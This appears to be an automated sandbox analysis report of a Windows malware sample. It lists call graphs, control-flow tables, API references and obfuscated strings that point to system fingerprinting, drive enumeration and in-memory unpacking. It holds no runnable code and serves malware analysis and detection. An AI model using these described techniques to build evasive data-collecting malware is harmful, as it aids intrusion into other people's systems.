26687->26685 26689 43cce0 LdrInitializeThunk 26687->26689 26689->26685 26690->26687 26967 408710 26969 40871f 26967->26969 26968 408a9d ExitProcess 26969->26968 26970 408734 GetCurrentProcessId GetCurrentThreadId 26969->26970 26974 408a86 26969->26974 26971 408771 SHGetSpecialFolderPathW 26970->26971 26972 408769 26970->26972 26976 408850 26971->26976 26972->26971 26980 43cc50 FreeLibrary 26974->26980 26975 4088e6 GetForegroundWindow 26977 408903 26975->26977 26976->26975 26977->26974 26979 40b6b0 FreeLibrary 
FreeLibrary 26977->26979 26979->26974 26980->26968 26981 416f91 26982 41719e 26981->26982 26983 416f9d 26981->26983 26983->26983 26984 43fe90 LdrInitializeThunk 26983->26984 26984->26982 26691 42ab53 26692 42ab5f FreeLibrary 26691->26692 26694 42ab8e 26692->26694 26694->26694 26695 42ac20 GetComputerNameExA 26694->26695 26696 42ac59 26695->26696 26696->26696 26697 40d253 26698 40d270 26697->26698 26703 437a70 26698->26703 26700 40d338 26701 437a70 10 API calls 26700->26701 26702 40d4d8 26701->26702 26702->26702 26704 437aa0 CoCreateInstance 26703->26704 26706 437cab SysAllocString 26704->26706 26712 4381ee 26704->26712 26709 437d29 26706->26709 26708 438219 GetVolumeInformationW 26715 43823b 26708->26715 26710 437d31 CoSetProxyBlanket 26709->26710 26709->26712 26711 437d51 SysAllocString 26710->26711 26710->26712 26714 437e30 26711->26714 26712->26708 26714->26714 26716 437ea3 SysAllocString 26714->26716 26715->26700 26719 437ecd 26716->26719 26717 4381d5 SysFreeString SysFreeString 26717->26712 26718 4381cb 26718->26717 26719->26717 26719->26718 26720 437f11 VariantInit 26719->26720 26722 437f60 26720->26722 26721 4381ba VariantClear 26721->26718 26722->26721 26723 40a253 26724 40a350 26723->26724 26724->26724 26727 40af30 26724->26727 26726 40a3a6 26730 40afd0 26727->26730 26729 40aff5 26729->26726 26730->26729 26731 43cc70 26730->26731 26732 43ccc3 26731->26732 26733 43cc90 26731->26733 26735 43cca4 26731->26735 26736 43ccb8 26731->26736 26738 43b160 26732->26738 26733->26732 26733->26735 26737 43cca9 RtlReAllocateHeap 26735->26737 26736->26730 26737->26736 26739 43b173 26738->26739 26740 43b175 26738->26740 26741 43b18b RtlFreeHeap 26738->26741 26739->26736 26740->26741 26741->26736 26985 40d693 26989 4097c0 26985->26989 26987 40d69b CoUninitialize 26988 40d6c0 26987->26988 26990 4097d4 26989->26990 26990->26987 26742 8daa16 26743 8daa25 26742->26743 26746 8db1b6 26743->26746 26748 8db1d1 26746->26748 26747 8db1da CreateToolhelp32Snapshot 26747->26748 26749 
8db1f6 Module32First 26747->26749 26748->26747 26748->26749 26750 8daa2e 26749->26750 26751 8db205 26749->26751 26753 8dae75 26751->26753 26754 8daea0 26753->26754 26755 8daee9 26754->26755 26756 8daeb1 VirtualAlloc 26754->26756 26755->26755 26756->26755 26757 42ac5f 26759 42ac6b GetComputerNameExA 26757->26759 26760 42b6dd 26761 42b6e4 26760->26761 26762 42b787 GetPhysicallyInstalledSystemMemory 26761->26762 26763 42b7b0 26762->26763 26763->26763 26991 42051d 26992 420520 26991->26992 26992->26992 26993 43fe90 LdrInitializeThunk 26992->26993 26994 4205d1 26993->26994 26995 43d69c 26996 43d6b0 26995->26996 26998 43d75f 26996->26998 26999 43cce0 LdrInitializeThunk 26996->26999 26999->26998 27005 4203a0 27006 420400 27005->27006 27007 4203ae 27005->27007 27007->27006 27009 41f140 LdrInitializeThunk 27007->27009 27009->27006 27010 43b1a0 27011 43b1d0 27010->27011 27013 43b24e 27011->27013 27018 43cce0 LdrInitializeThunk 27011->27018 27013->27013 27015 43b423 27013->27015 27017 43b35e 27013->27017 27019 43cce0 LdrInitializeThunk 27013->27019 27014 43b160 RtlFreeHeap 27014->27015 27017->27014 27018->27013 27019->27017 27020 42e029 27023 414910 27020->27023 27022 42e02e CoSetProxyBlanket 27023->27022 26764 42ba6d 26765 42ba90 26764->26765 26765->26765 26766 42bb5e 26765->26766 26768 43cce0 LdrInitializeThunk 26765->26768 26768->26766 26769 40e672 26770 40e680 26769->26770 26774 40e712 26770->26774 26870 43cce0 LdrInitializeThunk 26770->26870 26771 40e8ce 26791 422bf0 26771->26791 26774->26771 26871 43cce0 LdrInitializeThunk 26774->26871 26776 40e907 26804 423300 26776->26804 26778 40e923 26823 4235c0 26778->26823 26780 40e942 26842 425b20 26780->26842 26784 40e973 26862 428690 26784->26862 26786 40e97c 26866 427810 26786->26866 26788 40e998 26789 431e20 6 API calls 26788->26789 26790 40e9bd 26789->26790 26792 422c50 26791->26792 26792->26792 26793 422c7d RtlExpandEnvironmentStrings 26792->26793 26795 422cc0 26793->26795 26794 422d3b RtlExpandEnvironmentStrings 26798 
422d5b 26794->26798 26799 422e61 26794->26799 26801 422d7c 26794->26801 26803 423047 26794->26803 26795->26794 26795->26798 26795->26799 26795->26801 26795->26803 26797 423031 GetLogicalDrives 26800 43fe90 LdrInitializeThunk 26797->26800 26798->26776 26799->26797 26799->26798 26799->26799 26799->26803 26800->26803 26801->26801 26872 43fe90 26801->26872 26803->26798 26876 420b40 26803->26876 26805 423390 26804->26805 26805->26805 26806 4233b0 RtlExpandEnvironmentStrings 26805->26806 26807 423400 26806->26807 26809 423473 26807->26809 26810 423721 26807->26810 26813 423452 RtlExpandEnvironmentStrings 26807->26813 26822 42358f 26807->26822 26898 43f130 RtlFreeHeap LdrInitializeThunk 26807->26898 26897 41f0c0 RtlFreeHeap LdrInitializeThunk 26809->26897 26899 43ee70 26810->26899 26813->26807 26813->26809 26813->26810 26813->26822 26817 43ed40 LdrInitializeThunk 26820 423786 26817->26820 26818 424531 26818->26818 26911 43f450 RtlFreeHeap LdrInitializeThunk 26818->26911 26819 424380 26912 43cce0 LdrInitializeThunk 26819->26912 26820->26817 26820->26818 26820->26819 26820->26820 26822->26778 26824 4235ce 26823->26824 26825 43ed40 LdrInitializeThunk 26824->26825 26828 42343a 26825->26828 26827 42358f 26827->26780 26828->26827 26829 423721 26828->26829 26830 423473 26828->26830 26834 423452 RtlExpandEnvironmentStrings 26828->26834 26917 43f130 RtlFreeHeap LdrInitializeThunk 26828->26917 26831 43ee70 2 API calls 26829->26831 26916 41f0c0 RtlFreeHeap LdrInitializeThunk 26830->26916 26833 423752 26831->26833 26835 43ed40 LdrInitializeThunk 26833->26835 26836 423786 26833->26836 26834->26827 26834->26828 26834->26829 26834->26830 26835->26836 26837 424531 26836->26837 26839 43ed40 LdrInitializeThunk 26836->26839 26840 424380 26836->26840 26837->26837 26918 43f450 RtlFreeHeap LdrInitializeThunk 26837->26918 26839->26836 26919 43cce0 LdrInitializeThunk 26840->26919 26843 425b40 26842->26843 26846 425bde 26843->26846 26920 43cce0 LdrInitializeThunk 26843->26920 26844 40e96a 26850 
426030 26844->26850 26846->26844 26849 425d1e 26846->26849 26921 43cce0 LdrInitializeThunk 26846->26921 26847 43b160 RtlFreeHeap 26847->26844 26849->26847 26922 426050 RtlFreeHeap LdrInitializeThunk 26850->26922 26852 426044 26852->26784 26853 426039 26853->26852 26923 438e40 RtlFreeHeap LdrInitializeThunk 26853->26923 26855 426a30 26931 43cce0 LdrInitializeThunk 26855->26931 26856 43fcf0 LdrInitializeThunk 26861 4266f0 26856->26861 26860 42671a 26860->26784 26861->26855 26861->26856 26861->26860 26861->26861 26924 440030 LdrInitializeThunk 26861->26924 26925 440100 26861->26925 26863 428730 26862->26863 26863->26863 26864 42874d RtlExpandEnvironmentStrings 26863->26864 26865 428680 26864->26865 26865->26786 26865->26865 26867 427850 26866->26867 26867->26867 26868 427888 RtlExpandEnvironmentStrings 26867->26868 26869 4278d0 26868->26869 26869->26869 26870->26774 26871->26771 26873 43feb0 26872->26873 26874 43ffde 26873->26874 26888 43cce0 LdrInitializeThunk 26873->26888 26874->26799 26889 43fcf0 26876->26889 26878 4213dc 26878->26798 26879 42133c 26881 43b160 RtlFreeHeap 26879->26881 26883 42134e 26881->26883 26882 420b83 26882->26878 26886 420c4f 26882->26886 26893 43cce0 LdrInitializeThunk 26882->26893 26883->26878 26895 43cce0 LdrInitializeThunk 26883->26895 26886->26879 26887 43b160 RtlFreeHeap 26886->26887 26894 43cce0 LdrInitializeThunk 26886->26894 26887->26886 26888->26874 26890 43fd10 26889->26890 26891 43fe3e 26890->26891 26896 43cce0 LdrInitializeThunk 26890->26896 26891->26882 26893->26882 26894->26886 26895->26883 26896->26891 26897->26822 26898->26807 26901 43ee90 26899->26901 26900 423752 26900->26820 26907 43ed40 26900->26907 26903 43eeee 26901->26903 26913 43cce0 LdrInitializeThunk 26901->26913 26903->26900 26906 43efdf 26903->26906 26914 43cce0 LdrInitializeThunk 26903->26914 26904 43b160 RtlFreeHeap 26904->26900 26906->26904 26906->26906 26909 43ed60 26907->26909 26908 43ee3f 26908->26820 26909->26908 26915 43cce0 LdrInitializeThunk 26909->26915 
26911->26819 26912->26822 26913->26903 26914->26906 26915->26908 26916->26827 26917->26828 26918->26840 26919->26827 26920->26846 26921->26849 26922->26853 26923->26861 26924->26861 26926 440120 26925->26926 26929 44017e 26926->26929 26932 43cce0 LdrInitializeThunk 26926->26932 26927 44022e 26927->26861 26929->26927 26933 43cce0 LdrInitializeThunk 26929->26933 26931->26860 26932->26929 26933->26927 27024 43d7b1 27025 43d7be 27024->27025 27026 43d7b0 27024->27026 27026->27024 27026->27025 27028 43cce0 LdrInitializeThunk 27026->27028 27028->27025 26934 40c8f6 CoInitializeEx CoInitializeEx 27029 43ce34 27030 43ce3d GetForegroundWindow 27029->27030 27031 43ce50 27030->27031 27032 43b13b RtlAllocateHeap 26935 410b7a 26936 410b94 26935->26936 26937 410df8 RtlExpandEnvironmentStrings 26936->26937 26941 40f1a1 26936->26941 26938 410e6b 26937->26938 26939 410f25 RtlExpandEnvironmentStrings 26938->26939 26938->26941 26939->26941 26942 410fa0 26939->26942 26943 415660 26942->26943 26944 415680 26943->26944 26944->26944 26945 43fcf0 LdrInitializeThunk 26944->26945 26946 4157ad 26945->26946 26947 4159de 26946->26947 26948 4157cf 26946->26948 26953 415803 26946->26953 26954 440030 LdrInitializeThunk 26946->26954 26947->26941 26948->26947 26950 440100 LdrInitializeThunk 26948->26950 26948->26953 26950->26953 26952 415a05 26953->26947 26955 43cce0 LdrInitializeThunk 26953->26955 26954->26948 26955->26952 27033 247003c 27034 2470049 27033->27034 27048 2470e0f SetErrorMode SetErrorMode 27034->27048 27039 2470265 27040 24702ce VirtualProtect 27039->27040 27042 247030b 27040->27042 27041 2470439 VirtualFree 27046 24705f4 LoadLibraryA 27041->27046 27047 24704be 27041->27047 27042->27041 27043 24704e3 LoadLibraryA 27043->27047 27045 24708c7 27046->27045 27047->27043 27047->27046 27049 2470223 27048->27049 27050 2470d90 27049->27050 27051 2470dad 27050->27051 27052 2470238 VirtualAlloc 27051->27052 27053 2470dbb GetPEB 27051->27053 27052->27039 27053->27052

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 0 437a70-437a95 1 437aa0-437ab2 0->1 1->1 2 437ab4-437ac9 1->2 3 437ad0-437afd 2->3 3->3 4 437aff-437b45 3->4 5 437b50-437b70 4->5 5->5 6 437b72-437b91 5->6 8 437b93-437ba8 6->8 9 437bfc-437c07 6->9 11 437bb0-437bed 8->11 10 437c10-437c49 9->10 10->10 13 437c4b-437ca5 CoCreateInstance 10->13 11->11 12 437bef-437bf4 11->12 12->9 14 437cab-437cdf 13->14 15 438209-438239 call 43e770 GetVolumeInformationW 13->15 16 437ce0-437cfe 14->16 20 438243-438245 15->20 21 43823b-43823f 15->21 16->16 18 437d00-437d2b SysAllocString 16->18 26 437d31-437d4b CoSetProxyBlanket 18->26 27 4381f8-438205 18->27 22 438267-43826e 20->22 21->20 24 438270-438277 22->24 25 438287-438299 22->25 24->25 28 438279-438285 24->28 29 4382a0-4382b4 25->29 30 437d51-437d67 26->30 31 4381ee-4381f4 26->31 27->15 28->25 29->29 32 4382b6-4382d5 29->32 33 437d70-437da4 30->33 31->27 35 4382e0-438302 32->35 33->33 36 437da6-437e26 SysAllocString 33->36 35->35 37 438304-43832f call 41de20 35->37 38 437e30-437ea1 36->38 43 438330-438338 37->43 38->38 40 437ea3-437ecf SysAllocString 38->40 44 4381d5-4381ea SysFreeString * 2 40->44 45 437ed5-437ef7 40->45 43->43 46 43833a-43833c 43->46 44->31 53 4381cb-4381d1 45->53 54 437efd-437f00 45->54 47 438342-438352 call 408150 46->47 48 438250-438261 46->48 47->48 48->22 51 438357-43835e 48->51 53->44 54->53 55 437f06-437f0b 54->55 55->53 56 437f11-437f59 VariantInit 55->56 57 437f60-437f8e 56->57 57->57 58 437f90-437fa2 57->58 59 437fa6-437fa8 58->59 60 4381ba-4381c7 VariantClear 59->60 61 437fae-437fb4 59->61 60->53 61->60 62 437fba-437fc4 61->62 63 437fc6-437fcd 62->63 64 437ffd-437fff 62->64 66 437fdc-437fe0 63->66 65 438001-43801b call 4080d0 64->65 75 438021-43802d 65->75 76 438154-438174 65->76 67 437fe2-437feb 66->67 68 437fd0 66->68 70 
437ff2-437ff6 67->70 71 437fed-437ff0 67->71 73 437fd1-437fda 68->73 70->73 74 437ff8-437ffb 70->74 71->73 73->65 73->66 74->73 75->76 77 438033-43803b 75->77 78 438176-43818c 76->78 79 4381ad-4381b6 call 4080e0 76->79 81 438040-43804a 77->81 78->79 82 43818e-4381a4 78->82 79->60 84 438060-438066 81->84 85 43804c-438051 81->85 82->79 86 4381a6-4381a9 82->86 88 438085-438097 84->88 89 438068-43806b 84->89 87 438100-438104 85->87 86->79 92 438106-43810e 87->92 90 43811a-438123 88->90 91 43809d-4380a0 88->91 89->88 93 43806d-438083 89->93 90->92 96 438125-438128 90->96 91->90 94 4380a2-4380fa 91->94 92->76 95 438110-438112 92->95 93->87 94->87 95->81 97 438118 95->97 98 438150-438152 96->98 99 43812a-43814e 96->99 97->76 98->87 99->87
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437C9D
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(07B905B6), ref: 00437D05
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(CAF053BA,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437D43
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(A81AAA16), ref: 00437DAB
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(0ECC08BC), ref: 00437EA8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(A5A4ABB2), ref: 00437F16
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004381F9
                                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438235
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                                                                                                                                              • String ID: $cB$0NuNup=Nu$C$\L$\L$nohi$v=$y>$}qrs
                                                                                                                                                                                                              • API String ID: 505850577-2634092947
                                                                                                                                                                                                              • Opcode ID: 8891c8da7b40583088632feed2e56bd3770d32be4c709d5240878b9ad7387b87
                                                                                                                                                                                                              • Instruction ID: cc161b6a6c57cf11917052797987524347fde2a2052227c3707b455a90f51f2d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8891c8da7b40583088632feed2e56bd3770d32be4c709d5240878b9ad7387b87
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D32EF71A083508FE714CF64C89076BBBE1EB89310F14892DF9D59B381DB78D906CB96

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 100 410b7a-410b92 101 410b94-410b97 100->101 102 410bc0-410bea call 401880 101->102 103 410b99-410bbe 101->103 106 410bec-410bef 102->106 103->101 107 410bf1-410c37 106->107 108 410c39-410c5f call 401880 106->108 107->106 111 410c61-410c8d call 414500 108->111 112 410c63-410c67 108->112 120 410c91-410cd2 call 4080d0 call 40a7d0 111->120 121 410c8f 111->121 114 41170a 112->114 115 4121e4 114->115 117 4121e6-4121e9 call 401f40 115->117 127 40f1b4-40f1da call 401f50 117->127 128 40f1ad-4121fa 117->128 132 410cd4-410cd7 120->132 121->120 134 40f1dc-40f1df 127->134 135 410cd9-410d28 132->135 136 410d2a-410d51 call 401880 132->136 137 40f1e1-40f1f6 134->137 138 40f1f8-40f21a call 401e40 134->138 135->132 143 410da3-410dd0 call 414500 136->143 144 410d53-410d74 call 414500 136->144 137->134 146 40f21c-40f245 138->146 147 40f21e 138->147 152 410dd2 143->152 153 410dd4-410e69 call 4080d0 call 40a7d0 RtlExpandEnvironmentStrings 143->153 155 410d76 144->155 156 410d78-410da1 call 4080d0 call 40a7d0 144->156 154 40f249-40f24c 146->154 147->117 152->153 170 410e6b-410e6e 153->170 158 40f2aa-40f2ff call 401980 154->158 159 40f24e-40f2a8 154->159 155->156 156->143 158->115 168 40f305 158->168 159->154 168->115 171 410e70-410ed5 170->171 172 410ed7-410ee4 170->172 171->170 173 410f00-410f19 172->173 174 410ee6-410efb call 4080e0 172->174 175 410f1b 173->175 176 410f1d-410f73 call 4080d0 RtlExpandEnvironmentStrings 173->176 174->114 175->176 182 410fa0-410fcf call 4080e0 176->182 183 410f75-410f9b call 4080e0 * 2 176->183 192 410fd1-410fd4 182->192 198 411708 183->198 194 411001-41101f call 401880 192->194 195 410fd6-410fff 192->195 200 411021-411068 call 414500 194->200 201 4110a0-4110b8 194->201 195->192 198->114 208 41106a 200->208 209 41106c-41109c call 
4080d0 call 40a7d0 200->209 202 4110ba-4110bd 201->202 204 411102-411146 call 401b90 202->204 205 4110bf-411100 202->205 212 411149-41114c 204->212 205->202 208->209 209->201 214 4111aa-4111d8 call 401a90 212->214 215 41114e-4111a8 212->215 220 4115c7-411646 call 408ca0 call 415660 214->220 221 4111de-41124b call 401f40 214->221 215->212 229 41164b-41165f call 4097c0 220->229 227 41124d 221->227 228 41124f-411272 call 4080d0 221->228 227->228 233 4112a2-4112a8 228->233 234 411274-411282 228->234 238 411661-411672 229->238 239 411696-4116c7 call 4080e0 * 2 229->239 237 4112aa-4112ac 233->237 240 411284-411295 call 414620 234->240 242 4112b3-4112f5 call 401f50 237->242 243 4112ae 237->243 248 411674 238->248 249 411686-411692 call 4080e0 238->249 271 4116c9-4116d5 call 4080e0 239->271 272 4116da-4116e7 239->272 256 411297 240->256 257 411299-4112a0 240->257 259 4112f7-4112fa 242->259 243->220 254 411676-411682 call 4147a0 248->254 249->239 265 411684 254->265 256->240 257->233 263 411322-411362 call 401880 259->263 264 4112fc-411320 259->264 270 411364-411367 263->270 264->259 265->249 275 411436-41147e call 401880 270->275 276 41136d-411431 270->276 271->272 273 4116e9-4116f5 call 4080e0 272->273 274 4116fa-411706 call 408d80 272->274 273->274 274->198 285 411480-411483 275->285 276->270 286 411485-4114c5 285->286 287 4114c7-411516 call 401b90 285->287 286->285 290 41151d-411520 287->290 291 411522-411556 290->291 292 411558-4115c2 call 401b90 call 414640 290->292 291->290 292->237
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: +$0$0$S$X$Z$[$l$n$r$~
                                                                                                                                                                                                              • API String ID: 0-3752990600
                                                                                                                                                                                                              • Opcode ID: 6748b20905f0a59a808ec4d1197bd9751c67a00e6889925f8079b97ae6e61d50
                                                                                                                                                                                                              • Instruction ID: fcf71eb36b81d8820df2b731dc9560538e6f095d8e2f441b6ca90ab2514b3ab9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6748b20905f0a59a808ec4d1197bd9751c67a00e6889925f8079b97ae6e61d50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3962D43260C7908BC3249B38C4953EFBBD1ABC5324F198A3ED5E9973D1D67988858B47

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 297 420b40-420b88 call 43fcf0 300 420b8e-420bee call 4148f0 call 43b130 297->300 301 42143c-42144c 297->301 306 420bf0-420bf3 300->306 307 420bf5-420c3a 306->307 308 420c3c-420c40 306->308 307->306 309 420c42-420c4d 308->309 310 420c54-420c6d 309->310 311 420c4f 309->311 313 420c74-420c7f 310->313 314 420c6f 310->314 312 420d0c-420d0f 311->312 315 420d13-420d18 312->315 316 420d11 312->316 317 420cfb-420d00 313->317 318 420c81-420cf1 call 43cce0 313->318 314->317 319 421340-42137e call 43b160 315->319 320 420d1e-420d2e 315->320 316->315 322 420d02 317->322 323 420d04-420d07 317->323 326 420cf6 318->326 331 421380-421383 319->331 324 420d30-420d50 320->324 322->312 323->309 327 420f76 324->327 328 420d56-420d7a 324->328 326->317 332 420f78-420f7b 327->332 330 420d7e-420d81 328->330 333 420d83-420dcf 330->333 334 420dd1-420def call 421450 330->334 335 421385-4213ca 331->335 336 4213cc-4213d2 331->336 337 420f83-420f99 call 43b130 332->337 338 420f7d-420f81 332->338 333->330 334->327 352 420df5-420e20 334->352 335->331 341 4213d4-4213da 336->341 349 420f9b-420faf 337->349 350 420f9d-420fa8 337->350 342 420fb1-420fb3 338->342 347 4213de-4213f0 341->347 348 4213dc 341->348 344 42131a-421320 342->344 345 420fb9-420fe1 342->345 355 421322-42132a 344->355 356 42132c-421330 344->356 351 420fe5-420fe8 345->351 353 4213f2 347->353 354 4213f4-4213fa 347->354 348->301 349->342 358 421334-421336 350->358 359 4210de-421119 351->359 360 420fee-4210d9 351->360 361 420e24-420e27 352->361 362 421423-421426 353->362 354->362 363 4213fc-421421 call 43cce0 354->363 364 421332 355->364 356->364 358->324 365 42133c-42133e 358->365 368 42111b-42111e 359->368 360->351 369 420ea2-420ebe call 421450 361->369 370 420e29-420ea0 361->370 366 421438-42143a 362->366 367 
421428-421436 362->367 363->362 364->358 365->319 366->301 367->341 374 421120-421165 368->374 375 421167-42116b 368->375 379 420ec0 369->379 380 420ec5-420edc 369->380 370->361 374->368 377 42116d-421178 375->377 381 42117a 377->381 382 42117f-42119a 377->382 379->332 385 420ee0-420f74 call 4080d0 call 414560 call 4080e0 380->385 386 420ede 380->386 387 42124c-421256 381->387 383 4211a1-4211ac 382->383 384 42119c 382->384 388 421239-421240 383->388 389 4211b2-42122f call 43cce0 383->389 384->388 385->332 386->385 391 42125a-421279 387->391 392 421258 387->392 395 421242 388->395 396 421244-421247 388->396 398 421234 389->398 397 42127b-42127e 391->397 392->391 395->387 396->377 400 421280-4212ab 397->400 401 4212ad-4212b3 397->401 398->388 400->397 403 4212b5-4212b9 401->403 404 4212eb-4212ee 401->404 407 4212bb-4212c2 403->407 405 421303-421309 404->405 406 4212f0-421301 call 43b160 404->406 412 42130b-42130e 405->412 406->412 408 4212d2-4212db 407->408 409 4212c4-4212d0 407->409 413 4212df-4212e5 408->413 414 4212dd 408->414 409->407 412->344 417 421310-421318 412->417 418 4212e7-4212e9 413->418 414->418 417->358 418->404
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: !@$,$@$C$F$H$I$L$N$O$jW}U$jW}U$jW}U$jW}U$jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-2791824542
                                                                                                                                                                                                              • Opcode ID: dceffeb474940c31a35251e24658468f7501d0f388ff1f300dc0d0addb33ba0f
                                                                                                                                                                                                              • Instruction ID: fff8086a162989c9b59c9fe3eb582520f5d4666dc6dfea75adcd7363b3c4d079
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dceffeb474940c31a35251e24658468f7501d0f388ff1f300dc0d0addb33ba0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8832E67260C7A08BD324CE38D88036FFBE1AB95314F598A2EE5E5873D1D67D8845874B

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 420 422bf0-422c47 421 422c50-422c7b 420->421 421->421 422 422c7d-422cbf RtlExpandEnvironmentStrings 421->422 423 422cc0-422cfb 422->423 423->423 424 422cfd-422d08 423->424 425 422d63-422d6c call 4080e0 424->425 426 422e86-422e8e 424->426 427 423085-423129 424->427 428 42306a 424->428 429 422d0f-422d14 424->429 430 422d6f-422d7b 424->430 431 422d30-422d36 call 4080d0 424->431 432 422e70 424->432 433 422e76-422e7d 424->433 434 422d3b-422d54 RtlExpandEnvironmentStrings 424->434 435 422d5b 424->435 436 423058-423062 424->436 437 422d7c-422d84 424->437 425->430 444 422e90-422e95 426->444 445 422e97 426->445 441 423130-423175 427->441 442 422d16-422d1b 429->442 443 422d1d 429->443 431->434 432->433 433->426 434->425 434->426 434->427 434->428 434->430 434->432 434->433 434->435 434->436 434->437 435->425 436->428 439 422d86-422d8b 437->439 440 422d8d 437->440 448 422d94-422dd4 call 4080d0 439->448 440->448 441->441 449 423177-423183 call 420b40 441->449 450 422d20-422d26 442->450 443->450 451 422e9e-422f43 call 4080d0 444->451 445->451 459 422de0-422df4 448->459 457 423188-42318b 449->457 450->431 460 422f50-422fcf 451->460 463 423193-4231ab 457->463 459->459 462 422df6-422e02 459->462 460->460 461 422fd5-422fe1 460->461 464 422fe3-422fe8 461->464 465 423001-42300e 461->465 466 422e21-422e2e 462->466 467 422e04-422e09 462->467 468 4231b0-423206 463->468 469 422ff0-422fff 464->469 470 423010-423014 465->470 471 423031-423051 GetLogicalDrives call 43fe90 465->471 473 422e30-422e34 466->473 474 422e51-422e5c call 43fe90 466->474 472 422e10-422e1f 467->472 468->468 475 423208-42328f 468->475 469->465 469->469 476 423020-42302f 470->476 471->425 471->428 471->430 471->436 471->463 484 423070-423076 call 4080e0 471->484 485 4232e5 471->485 486 
4232eb-4232f1 call 4080e0 471->486 487 42307f 471->487 472->466 472->472 478 422e40-422e4f 473->478 482 422e61-422e69 474->482 480 423290-4232b8 475->480 476->471 476->476 478->474 478->478 480->480 483 4232ba-4232dd call 420640 480->483 482->426 482->427 482->428 482->432 482->433 482->436 482->463 482->484 483->485 484->487 485->486 487->427
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,31B1BF0D,0000000E,00000000,00000000,31B1BEA3), ref: 00422CAF
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,31B1BEBB), ref: 00422D49
                                                                                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 00423036
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings$DrivesLogical
                                                                                                                                                                                                              • String ID: -*$;-B$G$z
                                                                                                                                                                                                              • API String ID: 1624009813-1819769908
                                                                                                                                                                                                              • Opcode ID: d124cf9099b7a29feb56647592603f6d51bfefdcb8caa7444de7da1b30390289
                                                                                                                                                                                                              • Instruction ID: 699f8274632e480e57769050a871d479fc9d4677c65a78bea885afb816feaa92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d124cf9099b7a29feb56647592603f6d51bfefdcb8caa7444de7da1b30390289
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31020EB52083409FD314CF69E99126BBBE1FBC6304F44892DE5958B352E7B88906CB97

                                                                                                                                                                                                              Control-flow Graph

